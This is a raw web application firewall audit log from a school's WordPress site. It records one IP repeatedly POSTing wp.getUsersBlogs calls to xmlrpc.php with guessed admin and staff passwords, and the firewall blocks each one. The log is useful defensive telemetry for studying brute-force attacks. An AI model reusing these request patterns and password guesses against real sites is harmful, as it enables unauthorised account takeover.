Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --707c036e-C-- wp.getUsersBlogs admin Marketing2010 --707c036e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --707c036e-E-- --707c036e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (151+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776115311929 5587 (- - -) Stopwatch2: 1744776115311929 5587; combined=3994, p1=505, p2=3244, p3=0, p4=0, p5=142, sr=104, sw=103, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --707c036e-Z-- --91d0f862-A-- [16/Apr/2025:11:02:55 +0700] Z_8r70-sESiKFppgz04XQAAAAM4 103.236.140.4 51990 103.236.140.4 8181 --91d0f862-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --91d0f862-C-- wp.getUsersBlogs admin Admin9876 --91d0f862-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --91d0f862-E-- --91d0f862-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (142+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776175378574 5924 (- - -) Stopwatch2: 1744776175378574 5924; combined=4055, p1=529, p2=3343, p3=0, p4=0, p5=108, sr=96, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91d0f862-Z-- --69d43b4e-A-- [16/Apr/2025:11:03:55 +0700] Z_8sK0-sESiKFppgz04X1QAAANc 103.236.140.4 52288 103.236.140.4 8181 --69d43b4e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 215 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --69d43b4e-C-- wp.getUsersBlogs admin work --69d43b4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69d43b4e-E-- --69d43b4e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (148+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776235198949 5284 (- - -) Stopwatch2: 1744776235198949 5284; combined=3737, p1=514, p2=3056, p3=0, p4=0, p5=99, sr=134, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69d43b4e-Z-- --99144223-A-- [16/Apr/2025:11:04:55 +0700] Z_8sZxk9XPLR9cFiTEu7vgAAAAc 103.236.140.4 52596 103.236.140.4 8181 --99144223-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --99144223-C-- wp.getUsersBlogs admin sunshine --99144223-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --99144223-E-- --99144223-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (146+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776295036209 4707 (- - -) Stopwatch2: 1744776295036209 4707; combined=3517, p1=380, p2=2925, p3=0, p4=0, p5=119, sr=82, sw=93, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99144223-Z-- --163f7663-A-- [16/Apr/2025:11:04:57 +0700] Z_8saSpe92T0H9-Aa0y26QAAAEM 103.236.140.4 52606 103.236.140.4 8181 --163f7663-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --163f7663-C-- wp.getUsersBlogs admin 1234%^&* --163f7663-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --163f7663-E-- --163f7663-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776297172096 4443 (- - -) Stopwatch2: 1744776297172096 4443; combined=3325, p1=372, p2=2763, p3=0, p4=0, p5=117, sr=101, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --163f7663-Z-- --18742434-A-- [16/Apr/2025:11:05:55 +0700] Z_8soype92T0H9-Aa0y3IwAAAE4 103.236.140.4 52894 103.236.140.4 8181 --18742434-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --18742434-C-- wp.getUsersBlogs admin diamond --18742434-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18742434-E-- --18742434-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (148+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776355012939 4234 (- - -) Stopwatch2: 1744776355012939 4234; combined=3292, p1=375, p2=2740, p3=0, p4=0, p5=102, sr=81, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18742434-Z-- --503c2123-A-- [16/Apr/2025:11:06:55 +0700] Z_8s3xk9XPLR9cFiTEu8oAAAABQ 103.236.140.4 53212 103.236.140.4 8181 --503c2123-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --503c2123-C-- wp.getUsersBlogs admin liverpool1 --503c2123-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --503c2123-E-- --503c2123-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (156+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776415191642 5420 (- - -) Stopwatch2: 1744776415191642 5420; combined=3781, p1=482, p2=3128, p3=0, p4=0, p5=101, sr=102, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --503c2123-Z-- --5f55e003-A-- [16/Apr/2025:11:07:55 +0700] Z_8tGype92T0H9-Aa0y3dQAAAEA 103.236.140.4 53490 103.236.140.4 8181 --5f55e003-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5f55e003-C-- wp.getUsersBlogs wakakur wakakur2018 --5f55e003-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f55e003-E-- --5f55e003-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (136+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776475712974 6168 (- - -) Stopwatch2: 1744776475712974 6168; combined=4301, p1=564, p2=3561, p3=0, p4=0, p5=105, sr=100, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f55e003-Z-- --50b23a59-A-- [16/Apr/2025:11:08:55 +0700] Z_8tVype92T0H9-Aa0y36wAAAEE 103.236.140.4 53800 103.236.140.4 8181 --50b23a59-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --50b23a59-C-- wp.getUsersBlogs wakakur marketing2010_ --50b23a59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --50b23a59-E-- --50b23a59-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (148+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776535306107 4615 (- - -) Stopwatch2: 1744776535306107 4615; combined=3420, p1=388, p2=2839, p3=0, p4=0, p5=110, sr=81, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50b23a59-Z-- --7e5f8378-A-- [16/Apr/2025:11:09:55 +0700] Z_8tk0-sESiKFppgz04Y0QAAANM 103.236.140.4 54122 103.236.140.4 8181 --7e5f8378-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7e5f8378-C-- wp.getUsersBlogs wakakur 123465 --7e5f8378-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e5f8378-E-- --7e5f8378-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (156+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776595085000 4578 (- - -) Stopwatch2: 1744776595085000 4578; combined=3468, p1=384, p2=2863, p3=0, p4=0, p5=123, sr=80, sw=98, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e5f8378-Z-- --b683b24b-A-- [16/Apr/2025:11:10:55 +0700] Z_8tzype92T0H9-Aa0y4VgAAAFI 103.236.140.4 54432 103.236.140.4 8181 --b683b24b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b683b24b-C-- wp.getUsersBlogs wakakur admin123456789 --b683b24b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b683b24b-E-- --b683b24b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (154+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776655310369 4321 (- - -) Stopwatch2: 1744776655310369 4321; combined=3256, p1=360, p2=2731, p3=0, p4=0, p5=96, sr=82, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b683b24b-Z-- --630ded25-A-- [16/Apr/2025:11:11:38 +0700] Z_8t-k-sESiKFppgz04ZGAAAAM8 103.236.140.4 54656 103.236.140.4 8181 --630ded25-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --630ded25-C-- wp.getUsersBlogs wakakur 1234%^&* --630ded25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --630ded25-E-- --630ded25-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776698324531 3355 (- - -) Stopwatch2: 1744776698324531 3355; combined=2502, p1=265, p2=2099, p3=0, p4=0, p5=83, sr=62, sw=55, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --630ded25-Z-- --0260926a-A-- [16/Apr/2025:11:11:55 +0700] Z_8uCxk9XPLR9cFiTEu9VAAAAAc 103.236.140.4 54746 103.236.140.4 8181 --0260926a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0260926a-C-- wp.getUsersBlogs wakakur baseball --0260926a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0260926a-E-- --0260926a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (156+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776715060113 4413 (- - -) Stopwatch2: 1744776715060113 4413; combined=3399, p1=371, p2=2834, p3=0, p4=0, p5=110, sr=82, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0260926a-Z-- --d0112c0a-A-- [16/Apr/2025:11:12:55 +0700] Z_8uR5VnVduWmh0dMDMTVQAAAIs 103.236.140.4 55064 103.236.140.4 8181 --d0112c0a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d0112c0a-C-- wp.getUsersBlogs wakakur senha --d0112c0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0112c0a-E-- --d0112c0a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (152+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776775221480 4293 (- - -) Stopwatch2: 1744776775221480 4293; combined=3190, p1=350, p2=2661, p3=0, p4=0, p5=103, sr=79, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0112c0a-Z-- --a11b1c01-A-- [16/Apr/2025:11:13:55 +0700] Z_8ug5VnVduWmh0dMDMToQAAAJA 103.236.140.4 55378 103.236.140.4 8181 --a11b1c01-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a11b1c01-C-- wp.getUsersBlogs wakakur tottenham1 --a11b1c01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a11b1c01-E-- --a11b1c01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (155+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744776835169183 4346 (- - -) Stopwatch2: 1744776835169183 4346; combined=3387, p1=383, p2=2818, p3=0, p4=0, p5=107, sr=81, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a11b1c01-Z-- --2c74e644-A-- [16/Apr/2025:11:14:55 +0700] Z_8uv0-sESiKFppgz04ZVAAAAMM 103.236.140.4 55690 103.236.140.4 8181 --2c74e644-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2c74e644-C-- wp.getUsersBlogs wakahumas wakahumas1986 --2c74e644-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c74e644-E-- --2c74e644-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
